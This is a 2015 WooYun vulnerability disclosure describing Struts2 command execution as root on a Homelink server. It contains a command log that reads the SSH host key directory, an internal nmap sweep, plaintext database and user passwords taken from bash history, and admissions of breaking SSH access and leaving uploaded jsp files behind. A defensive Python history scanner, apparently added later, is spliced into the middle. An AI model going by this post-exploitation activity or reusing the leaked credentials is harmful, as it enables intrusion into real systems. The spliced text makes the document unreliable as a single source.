
Vulnerability Summary

Defect ID: wooyun-2015-0134544

Title: Struts2 command execution on a Homelink site

Vendor: homelink.com.cn

Author: xk0n

Submitted: 2015-08-17 11:21

Fixed: 2015-10-02 11:08

Published: 2015-10-02 11:08

Type: Command execution

Severity: Medium

Self-assessed Rank: 8

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2015-08-17: Details sent to the vendor, awaiting vendor action
2015-08-18: Vendor confirmed; details visible to the vendor only
2015-08-28: Details disclosed to core white hats and domain experts
2015-09-07: Details disclosed to regular white hats
2015-09-17: Details disclosed to intern white hats
2015-10-02: Details disclosed to the public

Brief description:

Struts2 command execution on a Homelink site; sensitive information can be obtained.

Detailed description:

The affected site is http://42.159.27.54/view_initIndexPageForCustomer.action

Target: http://42.159.27.54/view_initIndexPageForCustomer.action
Useage: S2-009
Whoami: root
WebPath: /usr/local/tomcat7/webapps/homelink/


A shell could be uploaded but had no execute permission, and chmod did not help either, so I gave up on that... I then uploaded an SSH public key, but still could not log in; presumably /etc/ssh/sshd_config would have needed changing. Later I found the host's public and private keys under /etc/ssh/, but I accidentally knocked out port 22... (><)

★K8cmd-> ls -l /etc/ssh/
====================================================================================================================================
total 160
-rw-------. 1 root root 125811 Nov 13 2014 moduli
-rw-r--r--. 1 root root 2047 Nov 13 2014 ssh_config
-rw------- 1 root root 3886 Aug 6 17:21 sshd_config
-rw-------. 1 root root 3880 Jul 2 17:15 sshd_config.20150702
-rw-------. 1 root root 668 Feb 9 2015 ssh_host_dsa_key
-rw-r--r--. 1 root root 590 Feb 9 2015 ssh_host_dsa_key.pub
-rw-------. 1 root root 963 Feb 9 2015 ssh_host_key
-rw-r--r--. 1 root root 627 Feb 9 2015 ssh_host_key.pub
-rw-------. 1 root root 1675 Feb 9 2015 ssh_host_rsa_key
-rw-r--r--. 1 root root 408 Feb 9 2015 ssh_host_rsa_key.pub
====================================================================================================================================
★K8cmd-> cat /etc/ssh/ssh_host_rsa_key
====================================================================================================================================
-----BEGIN RSA PRIVATE KEY-----
************************
-----END RSA PRIVATE KEY-----
====================================================================================================================================


However, /etc/passwd and /etc/shadow could be obtained for cracking the login passwords offline, but my wordlist was not up to it...
All sorts of information could still be read, and nmap was available for scanning the internal network.
The database password could be seen in /root/.bash_history:

/usr/local/mysql/bin/mysqladmin -uroot password 'homelink'


And kevin's:

***************
#1435828548
echo "e0GNnsFG234gFpgI945gfBfergGe453BCvbr8" |passwd --stdin kevin
*************
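As an added example (not part of the original report), a hygiene check an administrator can run over shell history files to find the kind of credential-bearing commands quoted above, so the lines can be purged and the passwords rotated. The sample history lines and password values are constructed placeholders, and the function and pattern names are my own.

```python
"""Flag credential-bearing commands in shell history (added example, not from the report).
The report found a mysqladmin password change and an 'echo ... | passwd --stdin' pipeline
in /root/.bash_history; this finds such lines so they can be purged and the passwords rotated."""
import re
from typing import Iterable, List, Tuple

# Each pattern captures the secret in a named group so the finding can be redacted.
CREDENTIAL_PATTERNS = [
    ("mysqladmin-password",
     re.compile(r"\bmysqladmin\b.*\bpassword\s+(?P<q>['\"]?)(?P<secret>[^'\"\s]+)(?P=q)")),
    ("passwd-stdin",
     re.compile(r"\becho\s+(?P<q>['\"]?)(?P<secret>[^'\"\s]+)(?P=q)\s*\|\s*passwd\s+--stdin\b")),
    ("mysql-inline-password",
     re.compile(r"\bmysql\b.*?\s-p(?P<secret>\S+)")),
]

Finding = Tuple[int, str, str]  # (line number, pattern name, redacted command)

def find_credential_leaks(history_lines: Iterable[str]) -> List[Finding]:
    """Return one finding per history line that embeds a credential."""
    findings: List[Finding] = []
    for lineno, raw in enumerate(history_lines, start=1):
        line = raw.rstrip("\n")
        # HISTTIMEFORMAT writes epoch stamps such as "#1435828548"; skip those.
        if not line or line.startswith("#"):
            continue
        for name, pattern in CREDENTIAL_PATTERNS:
            match = pattern.search(line)
            if match:
                redacted = line.replace(match.group("secret"), "<redacted>")
                findings.append((lineno, name, redacted))
                break  # one finding per line is enough
    return findings

def scan_history_file(path: str) -> List[Finding]:
    """Scan a history file on disk, e.g. /root/.bash_history."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return find_credential_leaks(fh)

# Constructed sample history; the passwords are placeholders, not real values.
SAMPLE_HISTORY = [
    "cd /usr/local/tomcat7/logs",
    "#1435828548",
    "/usr/local/mysql/bin/mysqladmin -uroot password 'Example-DB-Pass1'",
    'echo "Example-User-Pass2" |passwd --stdin kevin',
    "mysql -uapp -pExample-DB-Pass3 appdb",
]

if __name__ == "__main__":
    for lineno, name, cmd in find_credential_leaks(SAMPLE_HISTORY):
        print(f"line {lineno}: {name}: {cmd}")
```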


★K8cmd-> cat /tmp/test
====================================================================================================================================
# Nmap 5.51 scan initiated Sun Aug 16 19:51:51 2015 as: nmap -sP -oN /tmp/test 10.20.7.1/16
Nmap scan report for 10.20.0.4
Host is up (0.13s latency).
Nmap scan report for 10.20.0.5
Host is up (0.012s latency).
Nmap scan report for 10.20.5.5
Host is up (0.00090s latency).
Nmap scan report for 10.20.5.6
Host is up (0.00072s latency).
Nmap scan report for 10.20.5.7
Host is up (0.0011s latency).
Nmap scan report for 10.20.5.9
Host is up (0.00099s latency).
Nmap scan report for 10.20.5.10
Host is up (0.00063s latency).
Nmap scan report for 10.20.5.11
Host is up (0.00076s latency).
Nmap scan report for 10.20.5.12
Host is up (0.00076s latency).
Nmap scan report for 10.20.5.14
Host is up (0.00086s latency).
Nmap scan report for 10.20.6.1
Host is up (0.012s latency).
MAC Address: 12:34:56:78:9A:BC (Unknown)
Nmap scan report for 10.20.6.4
Host is up (0.053s latency).
MAC Address: 12:34:56:78:9A:BC (Unknown)
Nmap scan report for 10.20.6.5
Host is up (0.013s latency).
MAC Address: 12:34:56:78:9A:BC (Unknown)
Nmap scan report for hl-az-hrrecrup (10.20.6.7)
Host is up.
Nmap scan report for 10.20.6.8
Host is up (0.11s latency).
MAC Address: 12:34:56:78:9A:BC (Unknown)
Nmap scan report for 10.20.6.9
Host is up (0.13s latency).
MAC Address: 12:34:56:78:9A:BC (Unknown)
Nmap scan report for 10.20.6.10
Host is up (0.13s latency).
MAC Address: 12:34:56:78:9A:BC (Unknown)
=======================================================================================================================


You can only go as deep as your skills allow; this rookie stops here for now.
Finally I deleted the files I had written during testing, except for two jsp files and a test file under /usr/local/tomcat7/webapps/, which I apparently could not delete...

Proof of vulnerability:

See the details above.

Remediation:

Upgrade.

Copyright notice: please credit xk0n@WooYun when reposting.


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-08-18 11:07

Vendor reply:

Thanks to 路人甲 for submitting this vulnerability; we will address it promptly.

Latest status:

None